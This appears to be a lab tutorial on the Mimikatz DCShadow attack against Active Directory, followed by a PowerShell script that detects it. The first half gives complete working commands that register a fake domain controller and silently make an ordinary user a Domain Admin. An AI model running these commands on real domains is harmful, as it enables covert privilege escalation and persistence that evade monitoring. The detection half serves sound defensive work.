Active Directory Attack - DCShadow

DCShadow is a feature of Mimikatz, introduced in 2018, that lives in the lsadump module. It makes a compromised machine behave like a Domain Controller: it registers itself as a DC in Active Directory and then uses the replication RPC interface that only DCs normally speak to push its own data into a legitimate DC. Because the change arrives through replication rather than through an LDAP write on the target DC, it slips past most of the usual security controls, including the directory-change events your SIEM is watching. DCShadow is a stealthy post-exploitation technique for internal pentests. In simple words: if you have already compromised a Domain Admin (required, because registering a DC needs that level of access) and a few regular domain users in a SIEM-monitored network, DCShadow lets you make changes without triggering the usual alerts and use them to maintain persistence.
Let's demo this attack in our lab setup. As the screenshot below shows, we have access to two accounts: pc (Domain Admin) and Victim1 (Domain User).

Download a fresh copy of Mimikatz and transfer it to the compromised workstation. Open a CMD (window-1) with local administrator privileges and launch Mimikatz. Use !+ to register and start the mimidrv driver service, then !processtoken to take a SYSTEM token from it: the fake Domain Controller's RPC server has to run as SYSTEM.

So what evil can we think of now? Changing a user's privileges from Domain User to Domain Admin ;) Let's change the primaryGroupID of Victim1 to 512, the RID of the Domain Admins group.

Note: the same technique can modify any attribute of a user (or any other object) inside Active Directory; primaryGroupID is just the most direct route to Domain Admin.

In CMD (window-1), type the command below to stage the change to Victim1's primaryGroupID. Mimikatz now waits, acting as the fake DC, until the change is pushed.

Open a second CMD (window-2) running as the Domain Admin account and type the command below to push the change to the Domain Controller. The push registers the fake DC in the directory, has the real DC replicate the staged change from it, and then removes the registration again.

Everything seems to have worked. Let's verify whether Victim1's group membership actually changed. One caveat when checking: a primaryGroupID change never touches the Domain Admins group's member attribute, so it does not appear in the user's memberOf; read primaryGroupID directly or use a tool that resolves primary-group membership.

Voila!! Victim1 is now a member of "Domain Admins", with minimal or no alerts generated on the network.
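The three steps above (stage in window-1, push from window-2, verify), driven from PowerShell on the compromised workstation, as an added example that is not part of the original post's screenshots. The Mimikatz path, the LAB domain, the Domain Admin account pc and the target user victim1 are assumed lab values.

```powershell
# Added example, not the original post's own commands. Assumed lab values:
# Mimikatz unpacked in C:\Tools\mimikatz\x64, domain LAB, Domain Admin 'pc',
# target user 'victim1'.

# --- Window 1: prompt elevated as local administrator ---------------------
# '!+'            registers and starts the mimidrv kernel driver service
# '!processtoken' uses that driver to take a SYSTEM token for this process
# lsadump::dcshadow stages the attribute change and starts the fake DC's RPC
# server; the command blocks here until the push from window 2 arrives.
# No trailing "exit", so the console stays open while the fake DC is up.
Set-Location C:\Tools\mimikatz\x64
.\mimikatz.exe "!+" "!processtoken" `
    "lsadump::dcshadow /object:victim1 /attribute:primaryGroupID /value:512"

# --- Window 2: prompt running as the Domain Admin 'pc' -------------------
# e.g. started with:  runas /user:LAB\pc powershell.exe
# /push registers this host as a DC in the Configuration partition, asks the
# real DC to replicate from it, then removes the registration.
Set-Location C:\Tools\mimikatz\x64
.\mimikatz.exe "lsadump::dcshadow /push" "exit"

# --- Verification (any domain-joined host with RSAT) ----------------------
Import-Module ActiveDirectory

# primaryGroupID now reads 512. memberOf stays empty because the group's
# 'member' attribute was never written, which is why a check that only reads
# memberOf (or the group's member list) misses this change.
Get-ADUser victim1 -Properties primaryGroupID, memberOf |
    Select-Object SamAccountName, primaryGroupID, memberOf

# Get-ADGroupMember resolves primary-group membership, so victim1 is listed.
Get-ADGroupMember 'Domain Admins' | Select-Object SamAccountName
```

Window 1 must be elevated and keep running until window 2 has pushed; if the push is started before the fake DC's RPC server is listening, the real DC has nothing to replicate from and the change is silently dropped.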

The chart below lists the features Mimikatz can abuse with this technique (we abused the first one: modifying existing objects).

Is there any way to detect this attack? Yes. UnCoverDCShadow is a proof-of-concept PowerShell script that can raise alerts for this attack from any domain-joined machine, by watching the Configuration partition for the rogue DC registration the push creates. Some Suricata rules have also been released that spot the replication traffic on the wire.
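A point-in-time sweep for the artefacts a DCShadow push leaves in the directory and on the DC, as an added example written against the ActiveDirectory module; it is not the UnCoverDCShadow script. The function name Find-DCShadowArtefacts is an assumption. Checks 1 and 2 run as any domain user; check 3 needs read access to the DC's Security log (Event Log Readers) and Computer Account Management auditing turned on.

```powershell
# Added example, not the UnCoverDCShadow PoC. Mimikatz normally cleans up after
# the push, so a one-shot sweep catches an attack in progress or a failed
# cleanup; a continuous monitor (UnCoverDCShadow's approach) is needed to
# catch the few-second window reliably.
Import-Module ActiveDirectory

function Find-DCShadowArtefacts {
    $config  = (Get-ADRootDSE).configurationNamingContext
    $realDCs = (Get-ADDomainController -Filter *).Name     # known-good DC hostnames
    $drsGuid = 'E3514235-4B06-11D1-AB04-00C04FC2DCD2'      # DRS replication SPN prefix

    # 1. An nTDSDSA object is what makes AD treat a server as a DC. Each lives
    #    under CN=<server>,CN=Servers,CN=<site>,CN=Sites,<config>, and the
    #    parent server object names the host. A host that is not a real DC is rogue.
    $rogueDsa = Get-ADObject -SearchBase "CN=Sites,$config" `
                             -LDAPFilter '(objectClass=nTDSDSA)' |
        ForEach-Object {
            $serverDn = ($_.DistinguishedName -split ',', 2)[1]
            Get-ADObject $serverDn -Properties dNSHostName
        } |
        Where-Object { $realDCs -notcontains ($_.dNSHostName -split '\.')[0] }

    # 2. The rogue machine account is given two DC-only SPNs so the real DC
    #    will authenticate to it: GC/<host>/<domain> and <drsGuid>/<DSA GUID>/<domain>.
    $rogueSpn = Get-ADComputer -Filter * -Properties servicePrincipalName |
        Where-Object {
            $realDCs -notcontains $_.Name -and
            ($_.servicePrincipalName | Where-Object {
                $_ -like 'GC/*' -or $_ -like "$drsGuid/*" })
        }

    # 3. Those SPN writes are logged on the DC as event 4742 ("A computer
    #    account was changed") when Computer Account Management auditing is on.
    #    The SPN list sits in the message body, so match it for the DRS GUID.
    #    Legitimate DC promotions also produce this; triage any hit.
    $pdc = (Get-ADDomain).PDCEmulator
    $spnEvents = Get-WinEvent -ComputerName $pdc -ErrorAction SilentlyContinue -FilterHashtable @{
            LogName = 'Security'; Id = 4742; StartTime = (Get-Date).AddDays(-1) } |
        Where-Object { $_.Message -match $drsGuid }

    [PSCustomObject]@{
        RogueDsaServers   = @($rogueDsa  | Select-Object -ExpandProperty dNSHostName)
        RogueSpnComputers = @($rogueSpn  | Select-Object -ExpandProperty Name)
        SpnChangeEvents   = @($spnEvents | Select-Object TimeCreated, Message)
    }
}

Find-DCShadowArtefacts
```

Three empty lists mean only that nothing was present at the moment of the sweep; schedule it or, better, subscribe to directory change notifications on CN=Sites so the nTDSDSA creation is seen while the fake DC is still registered.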
